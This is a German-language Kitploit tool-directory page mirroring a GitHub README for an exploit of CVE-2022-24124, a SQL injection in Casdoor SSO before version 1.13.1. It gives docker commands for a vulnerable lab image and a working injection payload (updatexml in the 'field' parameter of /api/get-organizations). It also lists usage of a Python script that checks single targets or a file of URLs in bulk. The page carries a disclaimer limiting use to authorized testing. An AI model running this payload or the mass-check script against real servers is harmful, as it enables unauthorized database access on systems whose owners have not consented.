Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-24124 — CVE-2022-24124-Exploit | Kitploit
Tools/GitHubGitHub/b1gdog/cve-2022-24124
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

CVE-2022-24124-Exploit

Repository anzeigen
22vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Vorwort

Casdoor ist eine zentralisierte Single-Sign-On (SSO) Authentifizierungsplattform basierend auf OAuth 2.0/OIDC.


Kennung

CVE-ID: CVE-2022-24124

CNPD-ID: CNPD-202201-7304


Betroffene Versionen

Schweregrad: Hoch (7.5 HIGH)

POC/EXP: Öffentlich verfügbar

Casdoor < Casdoor 1.13.1 // Alle Versionen vor 1.13.1 sind betroffen


Beschreibung der Schwachstelle

Diese Schwachstelle ist eine SQL-Injection-Schwachstelle. In der Abfrage-API besteht eine SQL-Injection im Zusammenhang mit den Parametern 'field' und 'value', wie in api/get-organizations gezeigt.


Reproduktion

Schwachstellen-Image pullen

docker pull vulfocus/casdoor:1.13.0

Docker pull

Umgebung starten

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

dockerRun

Seite der Schwachstellenumgebung öffnen

Tool herunterladen

http

Payload mit POC konstruieren

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


Skript zur automatischen Überprüfung

Haftungsausschluss: Dieses Tool ist nur für Sicherheitsforschung oder autorisierte Penetrationstests bestimmt. Bei rechtswidriger Nutzung übernimmt der Autor keine Haftung.

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


Weitere Informationen

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

Basierend auf https://www.t00ls.com/thread-66989-1-1.html

Als Übung habe ich eine Python-Version geschrieben und eine Funktion zur Massenüberprüfung hinzugefügt.